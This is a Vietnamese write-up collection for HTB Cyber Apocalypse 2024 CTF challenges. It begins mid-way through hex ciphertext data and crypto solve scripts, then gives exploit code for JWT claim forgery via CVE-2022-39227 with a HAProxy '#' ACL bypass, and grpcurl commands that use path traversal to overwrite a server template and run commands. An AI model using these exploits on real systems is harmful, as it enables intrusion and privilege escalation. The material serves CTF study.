'a04f3e3535961e5adcfb8a2d066e87316f4ed96c5e2e07ba1c72cd11ee3c2ca252267bdc55693fdb84bb6e169e348349fac2f37db85bf9370fb9f49aa1b86961604e0d9f993feec339157299744812552e7e80dd1ff813ec7d93a8f076046bdb47d30b5289751374042e345be1e254ed0aac856bdcf3d5c65868e26302bf2b69f18f883fef5f46f67a0e90cbb4aab3baf855fe11dd06c5cf48cdddda23e90ec814055d904405821b50cd80e94c03a1c22b78a11dddce22cdf6adcb3c752cc0c9f9e49438687dc465911a2bdd0d7151a14f2a17f32ccd27737151ea0b21dbd0c6d4a7aad82ec87a90706e068184076e30471f6af43047bfb32c3aef141ab588a240985ac9ecd314a53d67e326f31f02de983e7ad3925fe8e575489fb40729531bafc471211f4c80496ff6d493ce27cc90e61db9d682842e6faa00a1eb4721a9f568bd4830ccce5000d2906276287a822153d2faab19c0a53f101367ca4a5d31089cd4b3154a159630cae34b43589cc1d15e291a57bff1e6f22f2d0e1da8cea6cf540c9d587d41e79be0769f69d219cbd499bbf182d6e65a3b9470b0034da7bd8b6e9230ac671c1c2dd75cc04cb093ef2751d1c7f355d870e30958682a2ef44a2edece705f6481a5e8dcc23d3600885e2ea5b8031c93946e869bd9ef6c5b5e6f9a5da3778c1504cdf8c6564be3d331dc6654c0a46265cfd17a996b8a5c1cb0ff0d'), ('c9e6539e83bfa3ce2e23c55a62658210', 'e1ada87c8e26e27fa1b254be9b79aab86ddbf9bfb7a8488f84469311befea74f69eab0447d76a0ffaa016392aef06cccdfe685dafcea6f79e3dba8b2bdf91563c06b29693fa2517e157af45b391d0f616e7f97b333b4b1b42996dc08c5be0acecf064d9f5b7019461698c22ff8c16e43da2eaefc70442ee50c1f5b5ff85cf84e48a1b4b187a2f93258865604d6ee17142ab338161a46dae40fd20c99797de6c23c8074753fa9a7f3e986a92dd8b2bcad18fb64fd342bcabf28db2cdd52cf5c02effc4e03ce12cdd075d5d22dde6a35917ef355f9523096c2e2ac9422b0b9327241d5740dbb84667c31bde3047db86693ab950e08fa958786b46fc75b73437626b674a7c90febbea8a186a2b84ee3c5cd0634460e53845d8a28ff29c65166fe3673aeb0e74827ef397837247d01d1bece06b547fdf4bbbb48716ea0f8bd8988123a0fea2b62bdfe1e4abfb6df41b6804747eb4bb49a8c27bcd62be316e018fb58606652421cd22f607daf060c6d2bf233680edad9b7bc49c1205c2670b259674272fade9b9a34d5cf82b34d70a87d06f1af49b7af657a477f9e105fb6d1c612d441f7582cc7471159e1a4275e0fea3729979d046d0fd88a91dc6f94312ea5ee9a0ed9dd152f9bd1598f14d05f877eeb72e93282d0034ae507e6a4b63d019274c8ffd533c4682c42815e8ebd44a938ba5a844bf26dea16e0dc3ea479741395602f'), ('1020dc977f2a38dd689000f5c09f1eea', '907f73d25d0abe361c7c367af7c277df254ab628acf62aa69c8fdc8499eefd768d1d0de6cf498a17070be451b3bc258ba929ed47b45cc3c74e18321ea1275ca433145dade987f2c16e1d61e8ac1d7fccc353c9dd6b08076a899ce11649d9404d46c999228a0b7e48338d78a746543b696b0dfbae3b063cbc86df88a32a428e3dde29d99ef7cd164a03db424461b5356ccaa3934bd8fa1565d10176d8199055676696d78563fdbffc27291093c9f69517072b7424fbffa5a4392eee62a9f8a9420e9cd70dc78d7cbdbc1edcaef4d1eba72a17074348af9ac241481579c92f0185e209ea9d54c1af5cd037be7bdcfe3f4bbae7e5fe77ad80ed8c9ce924fe65ca30252ad0e60e99903991c3ec00572a9416db52bc242af7a7e66d8ad65508782d639e119c3bc1f628e648a722930f2eefeb21a5f521daca791a94846170f598a524231fdf28d9efc48fdb68caa3ed5e1aa088bf6c42b297f4d3723858466c75494295704bf9b98dc3a238998938af08a407a0366527a519daf254ffce879a86e5bc3f6e21c32c6d3a6982f57fd6af0d22f96899696d47313dbfdef06671bb82045d787327a68b222cad797585663693366960e778ebc52896a76090c492ea15ba1d47784dfc09b08fc421007a537bc02f0f731df0e25e4d94e7f9410c12c46a930ef54a9c98a8837218db94823b4ea85bd0490f9a7d95d2dd6d24b5c1e3f46941b6'), ('9e6e93c485558d9d32e82c0e6bf5be00', 'c17b5932d26b6007f8720b8be1468d0fea831a2c90bbb2ec882b2d03e3e7ddb4f4f70807bcfd9b294c3c4a9917cea0f71b6d53e6551fc01336216d5866fd18c52ad0e282c67933cc22508a43af9923588ac26635282b3196b946a9b392086aa17c26050e17585513c804d9a9597acd20bc1a7d88984dc410f83deef27e5f832d73655cd0c9478bd9bdaef1823685358e91405bc5e07b0c9e741d0d0be1b779e1cdb02c87cc8f0cb3c32362fd49abe8ed953501dbb9a94de05b3ab1bed206b72b6a584e0b1416fae0ea3c806609f4b439008e5a43417726a63126cdbbd901501c24fb76ca0dc2ddb776b39ac20efd8da882dedc97b0e8ef8ff60529436b6567aea4a54330860483bba843d147257d081c0f5760458810eddadb1733102fc101b3fa5ec8bc7ce2d305f2d73665f4ea2298c23511a7a7357619a9f4bcc633eb6121584b600dbd1a97f8c4803edd449213184b95e02efe09d04a8475cd4504a07e2dedca17e3fe916e2e36fbb0ad599e569684ca0b0cc529bb4ad2fa3de9354be5c892611d13a42fdfcfa7cf655e5d28577774e9c1a68daf236ab0736bded07a1bfe194a72bb445c8be1ceec9132b2aa4659947d699ae3216d540d7dcda6f7bfcae6ae64c5a5f4355648c07801f18106c9b9d68b852b59956c799b0c2e8ee70317199b37a52a0878efd494650948a691a7915f323b95a24b7d606effa085362a3e81')]]
00cc03bebb6756fded9a55e772b665d3f98004163904713b83c0bfed06558e9ce57d1d50409179741b09d5f059d668d5fd7775892e403357200c5c516125cb53451f52d34f08e4e2885588c046360bfc44c84a3a4da194484d2ca414ba01e698221936ea8e372b6a3bf4af1c85a99e54df52b58d6a7a0add3752e88fa928c15d


Bài này thì mình có enc_msg và enc_flag. Có lẽ mình sẽ phải tìm lại msg trước để xem nó có hint gì cho việc tìm lại flag không.

Nhìn vào cách nó mã hóa thì msg được chia thành 10 phần mã hóa $CBC$, $iv$ thì có rồi nên chỉ cần tìm 10 cái key thôi.



Nhìn cách key được gen ra thì mình mình đoán là giá trị out chỉ toàn giá trị 0 hoặc toàn giá trị 1 . Tuy mới chỉ là tiên đoán đầu tiên nhưng mình cứ thử xem liệu có đúng $out = "0"*256$ không hoặc $out = "1"*256$ . Thì mình tìm lại được $msg$ thật :))


from Crypto.Util.number import *
from gmpy2 import *
import math
from pwn import *   
from tqdm import tqdm
from hashlib import sha256
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad
from output import *


MSG = []
for enc in enc_msg:
    for hint in enc:
        try:
            out = "0"*256
            iv = bytes.fromhex(hint[0])
            enc_msg = bytes.fromhex(hint[1])
            key = sha256(out.encode()).digest()
            cipher = AES.new(key, AES.MODE_CBC, iv)
            msg = unpad(cipher.decrypt(enc_msg),16)
            MSG.append(msg.decode())
            break
        except:
            pass

for msg in MSG:
    print(msg)




Theo 3 following ở trên thì mình cần tìm 1 đa thức từ 5 giá trị $shared$, sau đó hệ số tự do sẽ là $KEY$ để tìm lại flag.

Ở đây mình đoán có 5 giá trị $x$ thì phương trình cần tìm là phương trình bậc 4 thôi. Mình giải bằng ma trận nhé:


from Crypto.Util.number import *
from gmpy2 import *
import math
from pwn import *   
from tqdm import tqdm
from hashlib import sha256
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad

enc_flag = bytes.fromhex("00cc03bebb6756fded9a55e772b665d3f98004163904713b83c0bfed06558e9ce57d1d50409179741b09d5f059d668d5fd7775892e403357200c5c516125cb53451f52d34f08e4e2885588c046360bfc44c84a3a4da194484d2ca414ba01e698221936ea8e372b6a3bf4af1c85a99e54df52b58d6a7a0add3752e88fa928c15d")

x1 = [1, 27006418753792019267647881709336369603809025474153761185424552629526746515909]
x2 = [2, 76590454267924193303526931251420387908730989759486987968207839464816350274449]
x3 = [3, 67564500698667187837224046797217120599664632018519685208508601443605280795068]
x4 = [4, 57120102994643471094254225269948720992016639286627873340589938545214763610538]
x5 = [5, 87036956450994410488989322365773556006053008613964544744444104769020810012336]
p = 88061271168532822384517279587784001104302157326759940683992330399098283633319

B = [
    [x1[0]**4,x1[0]**3,x1[0]**2,x1[0]**1,1],
    [x2[0]**4,x2[0]**3,x2[0]**2,x2[0]**1,1],
    [x3[0]**4,x3[0]**3,x3[0]**2,x3[0]**1,1],
    [x4[0]**4,x4[0]**3,x4[0]**2,x4[0]**1,1],
    [x5[0]**4,x5[0]**3,x5[0]**2,x5[0]**1,1]
]

C = [x1[1],x2[1],x3[1],x4[1],x5[1]]

B = Matrix(GF(p),B)
C = vector(C)
A = B.solve_right(C)
KEY  = long_to_bytes(int(A[4]))

assert sha256(KEY).hexdigest().startswith('786f36dd7c9d902f1921629161d9b057')

cipher = AES.new(KEY, AES.MODE_ECB)
flag = unpad(cipher.decrypt(enc_flag),16)
print(flag)

Flag:HTB{what_a_cool_random_number_generator_by_bluuuuuum_bluuuuuum_and_shuuuuuub_i_implemented_it_securely_didnt_i?}
Not that random
credit: Zupp
Description

Challenge server:

from Crypto.Util.number import *
from Crypto.Random import random, get_random_bytes
from hashlib import sha256
from secret import FLAG

def success(s):
    print(f'\033[92m[+] {s} \033[0m')

def fail(s):
    print(f'\033[91m\033[1m[-] {s} \033[0m')

MENU = '''
Make a choice:

1. Buy flag (-500 coins)
2. Buy hint (-10 coins)
3. Play (+5/-10 coins)
4. Print balance (free)
5. Exit'''

def keyed_hash(key, inp):
    return sha256(key + inp).digest()

def custom_hmac(key, inp):
    return keyed_hash(keyed_hash(key, b"Improving on the security of SHA is easy"), inp) + keyed_hash(key, inp)

def impostor_hmac(key, inp):
    return get_random_bytes(64)

class Casino:
    def __init__(self):
        self.player_money = 100
        self.secret_key = get_random_bytes(16)

    def buy_flag(self):
        if self.player_money >= 500:
            self.player_money -= 500
            success(f"Winner winner chicken dinner! Thank you for playing, here's your flag :: {FLAG}")
        else:
            fail("You broke")

    def buy_hint(self):
        self.player_money -= 10
        hash_input = bytes.fromhex(input("Enter your input in hex :: "))
        if random.getrandbits(1) == 0:
            print("Your output is :: " + custom_hmac(self.secret_key, hash_input).hex())
        else:
            print("Your output is :: " + impostor_hmac(self.secret_key, hash_input).hex())

    def play(self):
        my_bit = random.getrandbits(1)
        my_hash_input = get_random_bytes(32)

        print("I used input " + my_hash_input.hex())

        if my_bit == 0:
            my_hash_output = custom_hmac(self.secret_key, my_hash_input)
        else:
            my_hash_output = impostor_hmac(self.secret_key, my_hash_input)

        print("I got output " + my_hash_output.hex())

        answer = int(input("Was the output from my hash or random? (Enter 0 or 1 respectively) :: "))

        if answer == my_bit:
            self.player_money += 5
            success("Lucky you!")
        else:
            self.player_money -= 10
            fail("Wrong!")

    def print_balance(self):
        print(f"You have {self.player_money} coins.")



def main():
    print("Welcome to my online casino! Let's play a game!")
    casino = Casino()

    while casino.player_money > 0:
        print(MENU)
        option = int(input('Option: '))

        if option == 1:
            casino.buy_flag()

        elif option == 2:
            casino.buy_hint()

        elif option == 3:
            casino.play()

        elif option == 4:
            casino.print_balance()

        elif option == 5:
            print("Bye.")
            break

    print("The house always wins, sorry ):")

if __name__ == '__main__':
    main()

Solution

Trước hết mình vẫn luôn phải hiểu chall đã. Trong chall này mình được tham gia vào một casino với 100 coins cho trước, và bằng cách nào đó phải kiếm được 500 coins để mua flag. Điều kiện khá đơn giản, tuy nhiên mấu chốt nằm ở cách kiếm tiền mình sẽ phân tích dưới đây.

Chall cung cấp cho chúng ta 3 chức năng chính (tổng có 5 cái):

Buy flag (-500)

Buy hint (-10)

Play (+5 / -10)




Buy hint

Chức năng này thó của mình 10 coins và cho phép chúng ta nhập input vào rồi sẽ nhả ngược lại cho mình hoặc là custom_hmac hoặc là impostor_hmac. impostor_hmac thì không có gì đáng nói, chỉ là 64 bytes ngẫu nhiên vô giá trị. custom_hmac(input) là 64 bytes có quy luật.

Play

Chức năng này random ra my_hash_input 32 bytes cho mình. Sau đó cũng nhả ra một dãy 64 bytes và bắt chúng ta phải đoán xem đó là custom_hmac(my_hash_input) hay impostor_hmac , nếu đúng thì ting ting 5 coins, ngược lại nếu sai thì pay 10 coins.

Phương hướng

Để biết được đó là custom_hmac hay impostor_hmac thì cần dựa vào input của chúng ta. Bởi impostor_hmac chỉ là dãy 64 bytes ngẫu nhiên, còn custom_hmac có quy luật như sau:

custom_hmac(input) = sha256(sha256(key + leak) + input) + sha256(key + input)
-> custom_hmac(my_hash_input) = sha256(sha256(key + leak) + my_hash_input) + sha256(key + my_hash_input)


Lưu ý trong cả hai chức năng thì key được cố định và đây cũng chính là cách để mình kiếm tiền.

Đầu tiên mình sẽ Buy hint từ server với input = leak = b"Improving on the security of SHA is easy", việc chúng ta nhận được custom_hmac khá hên xui.

Khi có được custom_hmac(leak), mình sẽ cắt lấy 32 bytes cuối để nhận được sha256(key + leak). Sau đó mình sẽ đem phần này chạy qua sha256 để khôi phục lại sha256(sha256(key + leak) + my_hash_input) do my_hash_input đã biết, chính xác đây chính là phần đầu 32 bytes của custom_hmac(my_hash_input) giúp mình phân biệt với impostor_hmac.



Code:


from pwn import *
from hashlib import sha256
from tqdm import tqdm

HOST = '94.237.49.212'
PORT = 30279
leak = b"Improving on the security of SHA is easy"

def keyed_hash(key, inp):
    return sha256(key + inp).digest()

r = remote(HOST, PORT)
lst = []
for _ in tqdm(range(10)):
    r.sendlineafter(b'Option: ', b'2')
    r.sendlineafter(b' :: ', bytes.hex(leak).encode())
    r.recvuntil(b' :: ')
    get = r.recvuntil(b'\n', drop=True).decode()
    if get in lst:
        exploit = bytes.fromhex(get)[32:]
        break
    else:
        lst.append(get)

for _ in tqdm(range(100)):
    r.sendlineafter(b'Option: ', b'3')
    r.recvuntil(b'I used input ')
    my_hash_input = r.recvuntil(b'\n', drop=True).decode()
    my_hash_input = bytes.fromhex(my_hash_input)

    r.recvuntil(b'I got output ')
    my_hash_output = r.recvuntil(b'\n', drop=True).decode()
    my_hash_output = bytes.fromhex(my_hash_output)

    check = keyed_hash(exploit, my_hash_input)
    answer = b'0' if check == my_hash_output[:32] else b'1'
    r.sendlineafter(b' :: ', answer)

r.sendlineafter(b'Option: ', b'1')
r.recvuntil(b' :: ')
flag = r.recvuntil(b'\n', drop=True)
print(flag)

Flag
HTB{#rule_of_thumb___do_not_roll_your_own_hash_based_message_authentication_codes___#_ab272f24245e73ec6c19b44331f587fb}



HTB Cyber Apocalypse CTF 2024: Hacker Royale Write Up
Anh Quỳnh — Sat, 23 Mar 2024 08:14:37 GMT

Web
Local Talk
credit: NgocTran
Preface
Đây là challenge từ giải Cyber Apocalypse 2024: Hacker Royale - After Party. Một challenge rất thú vị khi nó tồn tại hai lỗ hổng đáng chú ý CVE-2023-45539 và CVE-2022-39227. Bằng cách bypass HAproxy ACL dẫn đến việc truy cập vào được endpoint chứa đoạn jwt sử dụng python_jwt module version 3.3.3, ta có thể sử dụng hai lỗ hổng trên để thay đổi role của user từ đó giúp ta lấy được flag.
Recon
Challenge cung cấp cho chúng ta 3 api bảo gồm /api/v1/get_ticket, /api/v1/chat/{chatId} và /api/v1/flag


/api/v1/get_ticket
 @api_blueprint.route('/get_ticket', methods=['GET'])
 def get_ticket():

     claims = {
         "role": "guest", 
         "user": "guest_user"
     }

     token = jwt.generate_jwt(claims, current_app.config.get('JWT_SECRET_KEY'), 'PS256', datetime.timedelta(minutes=60))
     return jsonify({'ticket: ': token})

 Có vẻ tại endpoint này ta có thể tạo một đoạn token sử dụng PS256 - là một thuật toán chữ ký điện tử dựa trên chuỗi (Elliptic Curve Digital Signature Algorithm - ECDSA) được sử dụng trong JSON Web Signature (JWS). Tại đây ta có thể chú ý role của user được xét mặc định là guest.

/api/v1/get_ticket


@api_blueprint.route('/flag', methods=['GET'])
@authorize_roles(['administrator'])
def flag():
    return jsonify({'message': current_app.config.get('FLAG')}), 200

Để lấy được flag có vẻ ta phải set lại sao cho role được đặt là administrator
Như vậy mục tiêu bây giờ ta cần thay đổi role của user trong token là administrator. Tuy nhiên vấn đề xảy ra ở đây là khi ta truy cập vào endpoint /api/v1/get_ticket nói trên nó lại trả về cho chúng ta status_code 403

frontend haproxy
    bind 0.0.0.0:1337
    default_backend backend

    http-request deny if { path_beg,url_dec -i /api/v1/get_ticket }

Tiếp tục đi sâu vào challenge thì mình tìm được một đoạn HAproxy đã được config như trên
Access Control List (ACL) trong HAProxy: ACL là một cách để xác định các điều kiện để áp dụng các hành động cụ thể trên các yêu cầu hoặc kết nối. Chúng cho phép bạn thực hiện các quy tắc phân tách dựa trên các tiêu chí như địa chỉ IP, đường dẫn URL, header HTTP, và nhiều điều kiện khác để quyết định cách xử lý yêu cầu
Ở đoạn config nêu trên ta có thể dễ dang thấy HAProxy cấu hình lắng nghe cổng 1337, chuyển hướng yêu cầu không khớp đến backend backend. ACL kiểm tra đường dẫn yêu cầu, từ chối yêu cầu bắt đầu bằng /api/v1/get_ticket.
Wait, I can bypass this?

Get access ticket by bypassing HAProxy ACL with # fragment
CVE-2023-45539
Sau khi thực hiện googling mình phát hiện ta có thể sử dụng dấu # để có thể bypass qua việc config http-request deny. Cụ thể: HAProxy trước phiên bản 2.8.2 chấp nhận ký tự "#" trong phần URI, điều này có thể cho phép các kẻ tấn công từ xa thu thập thông tin nhạy cảm hoặc có tác động không xác định khác khi phân tích sai quy tắc path_end, ví dụ như định tuyến index.html#.png đến một máy chủ tĩnh

Forging a new JWT Token with tampered claims in order to bypass role restrictions
Sau khi có thể tạo ra được token, công việc của chúng ta đến chỉ cần thay đoạn token sao cho role của user thành administrator
Sau khi biết được nó sử dụng pyjwt 3.3.3 mình ngay lập tức google vài đường thì được biết tại phiên bản này nó tồn tại một lỗ hổng CVE-2022-39227. Hãy đề cập một chút về lỗ hổng này:
#test/vulnerability_vows.py  
""" Test claim forgery vulnerability fix """  
from datetime import timedelta  
from json import loads, dumps  
from test.common import generated_keys  
from test import python_jwt as jwt  
from pyvows import Vows, expect  
from jwcrypto.common import base64url_decode, base64url_encode  

@Vows.batch  
class ForgedClaims(Vows.Context):  
   """ Check we get an error when payload is forged using mix of compact and JSON formats """  
   def topic(self):  
       """ Generate token """  
       payload = {'sub': 'alice'}  
       return jwt.generate_jwt(payload, generated_keys['PS256'], 'PS256', timedelta(minutes=60))  

   class PolyglotToken(Vows.Context):  
       """ Make a forged token """  
       def topic(self, topic):  
           """ Use mix of JSON and compact format to insert forged claims including long expiration """  
          [header, payload, signature] = topic.split('.')  
           parsed_payload = loads(base64url_decode(payload)) 
           parsed_payload['sub'] = 'bob'  
           parsed_payload['exp'] = 2000000000  
           fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))  
           return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' +signature + '"}' 
       class Verify(Vows.Context):  
           """ Check the forged token fails to verify """  
           @Vows.capture_error  
           def topic(self, topic):  
               """ Verify the forged token """  
               return jwt.verify_jwt(topic, generated_keys['PS256'], ['PS256'])  
           def token_should_not_verify(self, r):  
               """ Check the token doesn't verify due to mixed format being detected """  
               expect(r).to_be_an_error()  
               expect(str(r)).to_equal('invalid JWT format')

Ta có thể thấy rằng JWT ban đầu được chia thành [header, payload, signature] ba phần, sau đó payload, đó là phần chứa thông tin ban đầu, được lấy ra, và sau đó thêm vào Sau khi đánh giả nội dung, mã hóa lại với base64 (separators=(',', ':') phần này tương đương với việc loại bỏ các khoảng trắng sẽ được thêm khi mã hóa trực tiếp) để tạo ra payload giả mạo, và cuối cùng xây dựng và tạo ra một JWT mới theo dạng sau đây (trong thực tế, không thể nói là một JWT nữa, bởi vì chuỗi được tạo ra không còn gì của JWT nữa).
{" header . fake_payload .":"","protected":" header ", "payload":" payload ","signature":" signature "}
Chúng ta hãy đi sâu vào chi tiết hơn, mình có tạo một đoạn code demo ở đây:
#testFakeJWT.py  
from json import *  
from python_jwt import *  
from jwcrypto import jwk  
payload={'username':"jlan","secret":"10010"}  
key=jwk.JWK.generate(kty='RSA', size=2048)  
jwtjson=generate_jwt(payload, key, 'PS256', timedelta(minutes=60))  
[header, payload, signature] = jwtjson.split('.')  
parsed_payload = loads(base64url_decode(payload))  
print(parsed_payload)  
parsed_payload['username']="admin"  
parsed_payload['secret']="10086"  
fakepayload=base64url_encode((dumps(parsed_payload, separators=(',', ':'))))  
fakejwt='{"' + header + '.' + fakepayload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'  
print(verify_jwt(fakejwt, key, ['PS256']))  

#{'exp': 1667333054, 'iat': 1667329454, 'jti': 'U0kwnEYCOgUZ_PhXn7PFTQ', 'nbf': 1667329454, 'secret': '10010', 'username': 'jlan'}  
#({'alg': 'PS256', 'typ': 'JWT'}, {'exp': 1667333054, 'iat': 1667329454, 'jti': 'U0kwnEYCOgUZ_PhXn7PFTQ', 'nbf': 1667329454, 'secret': '10086', 'username': 'root'})

Phân tích

Có thể thấy rằng JWT được chia thành các phần header, claims, signature dựa trên dấu chấm (.) và được lưu vào các biến tương ứng, sau đó phần header được giải mã base64. Việc giải mã ở đây sẽ bỏ qua các ký tự không phải base64, và các thuộc tính sẽ được kiểm tra một cách tuần tự (khi tham số ignore_not_implemented không được cung cấp hoặc False).
Nhìn xuống phần if pub_key:, nếu chúng ta truyền vào khóa, chữ ký JWT sẽ được phân tích. Hãy tiếp tục theo dõi token.deserialize(jwt, pub_key) để xem quá trình xác minh.

Có thể thấy rằng JWT ban đầu được nhận vào đầu tiên được thử để được phân tích dưới dạng json, sau đó chữ ký được xác minh. Hàm _deserialize_signature sẽ phân tích và lấy ra chữ ký. Hàm _deserialize_b64 liệu rằng nội dung xác minh cần được giải mã base64 không?
Tóm lại, nội dung ở phần trước của hàm này là giải mã dữ liệu trong định dạng json và gán các thuộc tính tương ứng được yêu cầu bởi JWT cho đối tượng o. Trong json mà chúng ta xây dựng, tất cả các thuộc tính của o đều từ JWT bình thường ban đầu. Sau khi hoàn thành việc phân tích, self.objects sẽ được gán một giá trị của o, và cuối cùng là vào hàm verify.

Bạn có thể thấy ở đây nó thực sự kiểm tra từng phần của JWT. Điều mà nó kiểm tra ở đây là JWT ban đầu hoàn chỉnh, vì vậy chắc chắn không có vấn đề gì với điều này, và việc xác minh này chắc chắn có thể thông qua
Chúng ta hãy quay trở lại với ___init__.py

Ta có thể thấy rằng sau khi xác minh, không có sử dụng lại token. Sau đó, một số tham số trong header và claims được kiểm tra, và parsed_header và parsed_claims được trả về. Như vậy, sau khi xác minh toàn bộ JWT, dữ liệu đã được xác minh không được trả về, mà thay vào đó là dữ liệu sau các dấu chấm ban đầu được trả về.
Lúc này đoạn exploit của chúng ta có dạng
{" header . fake_payload .":"","protected":" header ", "payload":" payload ","signature":" signature "}
Như đã thấy ở trên, json mà chúng ta truyền vào đầu tiên được chia thành các phần dấu chấm trong định dạng chuỗi. Phần thứ hai là phần payload giả mạo của chúng ta. Chúng ta chỉ cần lấy ra payload ban đầu và sửa đổi nó.
Exploit
from datetime import timedelta
from json import loads, dumps
import python_jwt as jwt
from pyvows import Vows, expect
from jwcrypto.common import base64url_decode, base64url_encode
from pprint import pprint
class ForgedClaims:
    def create(self):
        """ Generate token """
        # payload = {'sub': 'alice'}
        token = "eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAxNDc1MTksImlhdCI6MTcxMDE0MzkxOSwianRpIjoiYmQtcW5GYnBqcUhpbEFSeXN5aGwyUSIsIm5iZiI6MTcxMDE0MzkxOSwicm9sZSI6Imd1ZXN0IiwidXNlciI6Imd1ZXN0X3VzZXIifQ.s569WtLjeq3NQSI9GXVDfTYJSUrxdEGtCBnxjHnwEa6UWwS6RNfLF-qMjvAc-GiqHzG1Wx1SQd1tsqIqnIF6zz9zXFQaSimFgnYE0HvUwaI_XhzBJA-ZxmrgetgJjbOhKBOopKIXmtUt-LPE2tsB3yr6SJe-C2RvFlTzrgQMDrOtRBJJiXfYne1QI4nnXUFY0XsNXCpKQIe6ELHNmeE-F6Fj5s1AJwUEBwWJNVnmw_s5mVbL1hvIE54e2mJg5VK8PfCLXx4u-ghVRgGDRkUza4UpgM8nrSmTj5d40iREyz9M6PDvi0TFhuVvlQStrpz0UId-uyL4-Vwp9UnTOSNBRA"
        return token
    def topic(self, topic):
        """ Use mix of JSON and compact format to insert forged claims including long expiration """
        [header, payload, signature] = topic.split('.')
        parsed_payload = loads(base64url_decode(payload))
        print(parsed_payload)
        parsed_payload['role'] = 'administrator'
        parsed_payload['user'] = 'admin_user'
        print(parsed_payload)
        # parsed_payload['exp'] = 2000000000
        fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
        return '{"  ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
claime__ = ForgedClaims()
jwt = claime__.create()
print(claime__.topic(jwt))

Result

Flag
HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}
Testimonial
credit: NgocTran
Preface
Ta tiếp tục đến với challenge thứ hai, cũng là một challenge rất hay khi cách giải của nó lại không khó như ban đầu mình nghĩ bằng cách thay vì connect tới server chính, ta lại giải quyết bằng cách sử dụng grpc để tương tác và thực hiện ghi đè file nhằm trigger RCE.
Recon

Đi vào trang web của challenge thì ở đây có vẻ nó cho phép ta ghi nội dung và tên file sau đó được lưu trên server tại public/testimonials


Tuy nhiên tên file đã bị filter, điều này có vẻ khiến chúng ta không thể trigger được path traversal nhằm ghi đè file khác lên server nhằm mục đích RCE
Yeah một câu hỏi là How? lại bắt đầu


Hãy chú ý đến việc đoạn code có sử dụng gRPC

Đôi nét về gRPC
gRPC là một framework mã nguồn mở được Google phát triển, được sử dụng để tạo ra các dịch vụ RPC (Remote Procedure Call) hiệu suất cao, có khả năng đa ngôn ngữ và có khả năng mở rộng. gRPC sử dụng Protocol Buffers (protobuf) làm công cụ mô tả giao diện dịch vụ và định dạng dữ liệu. Nó cho phép tạo ra các dịch vụ và clients ở nhiều ngôn ngữ khác nhau, với khả năng tạo mã tự động từ mô tả giao diện. Các dịch vụ gRPC có thể sử dụng HTTP/2 để tận dụng các tính năng như multiplexing, độ trễ thấp, và giao thức mã hóa.
Như đã nói ở trên việc filter chỉ diễn ra trên đoạn xử lý với client, tuy nhiên server lại cung cấp cho ta hai server và một trong số đó là gRPC vậy điều gì xảy ra khi chúng ta sử dụng server thứ hai này để ghi đè file inject SSTI để RCE. Lúc này việc lọc tên file hay .. cũng sẽ không xảy ra vì lúc này ta chỉ tương tác với gRPC.

gRPC command line tool
Sau khi googling mình tìm được repo này khá thú vị.
Sử dụng nó chúng ta có thể liệt kê các services bằng cách specifying the proto file
./grpcurl -import-path ../challenge/pb/ -proto ptypes.proto 94.237.53.3:49854 list

RickyService

Tiếp tục , describe the service
./grpcurl -import-path ../challenge/pb/ -proto ptypes.proto 94.237.53.3:49854 describe RickyService

RickyService is a service:
service RickyService {
  rpc SubmitTestimonial ( .TestimonialSubmission ) returns ( .GenericReply );
}

Tuy nhiên, sau khi mình thử invoke RPC thì server does not support the reflection API
./grpcurl -plaintext 94.237.53.3:49854 RickyService.TestimonialSubmission

Error invoking method "RickyService.TestimonialSubmission": failed to query for service descriptor "RickyService": server does not support the reflection API

Tiếp tục tìm kiếm thì mình đọc được docs như sau:
To use grpcurl on servers that do not support reflection, you can use .proto source files.
In addition to using -proto flags to point grpcurl at the relevant proto source file(s), you may also need to supply -import-path flags to tell grpcurl the folders from which dependencies can be imported.

./grpcurl -plaintext -d '{"customer": "test", "testimonial": "test"}' -import-path challenge/pb/ -proto ptypes.proto 94.237.53.3:49854 RickyService.SubmitTestimonial

{
  "message": "Testimonial submitted successfully"
}

Yeah chúng ta đã thành công ghi được file lên gRPC thông qua grpcurl Như mình đã nói ở trên việc sử dụng gRPC để ghi file thì có thể chúng ta sẽ không bị filter lọc, lúc này việc path traversal để ghi đè file lại trở nên dễ dàng. Mình dựng lại challenge ở local và test xem liệu suy đoán của mình có đúng không.
./grpcurl -plaintext -d '{"customer": "../../../../haha.txt", "testimonial": "no for test"}' -import-path challenge/pb/ -proto ptypes.proto 127.0.0.1:50045 RickyService.SubmitTestimonial

{
  "message": "Testimonial submitted successfully"
}

$ docker exec -it web_testimonial bash

~ # ls /
bin                 flaga8f171e25e.txt  mnt                 sbin                usr
challenge           go                  opt                 srv                 var
dev                 home                proc                sys
entrypoint.sh       lib                 root                haha.txt
etc                 media               run                 tmp

Ghi file thành công, vậy điều gì nếu ta có thể ghi đè lại file index.templ do ta đã cấu hình lại với đoạn code nhằm trigger rce như sau:
package home

import (
    "os/exec"
    "strings"
)

func hack() []string {
    output, _ := exec.Command("ls", "/").CombinedOutput()
    lines := strings.Fields(string(output))
    return lines
}

templ Index() {
    @template(hack())
}

templ template(items []string) {
    for _, item := range items {
        {item}
    }
}

Exploit
./grpcurl -plaintext -d '{"customer": "../../view/home/index.templ", "testimonial": "package home\n\nimport (\n\t\"os/exec\"\n\t\"strings\"\n)\n\nfunc hack() []string {\n\toutput, _ := exec.Command(\"cat\", \"/flagbba4cb647c.txt\").CombinedOutput()\n\tlines := strings.Fields(string(output))\n\treturn lines\n}\n\ntempl Index() {\n\t@template(hack())\n}\n\ntempl template(items []string) {\n\tfor _, item := range items {\n\t\t{item}\n\t}\n}" }' -import-path challenge/pb/ -proto ptypes.proto 94.237.53.3:49854 RickyService.SubmitTestimonial

{
  "message": "Testimonial submitted successfully"
}

Flag
HTB {w34kly_t35t3d_t3mplate5}
SerialFlow
credit: hackerga2101
About vulnerebility

Memcache Remote Code Execution via SSRF by serialized data injection into Memcached

Documentation: https://btlfry.gitlab.io/notes/posts/memcached-command-injections-at-pylibmc/


Exploit

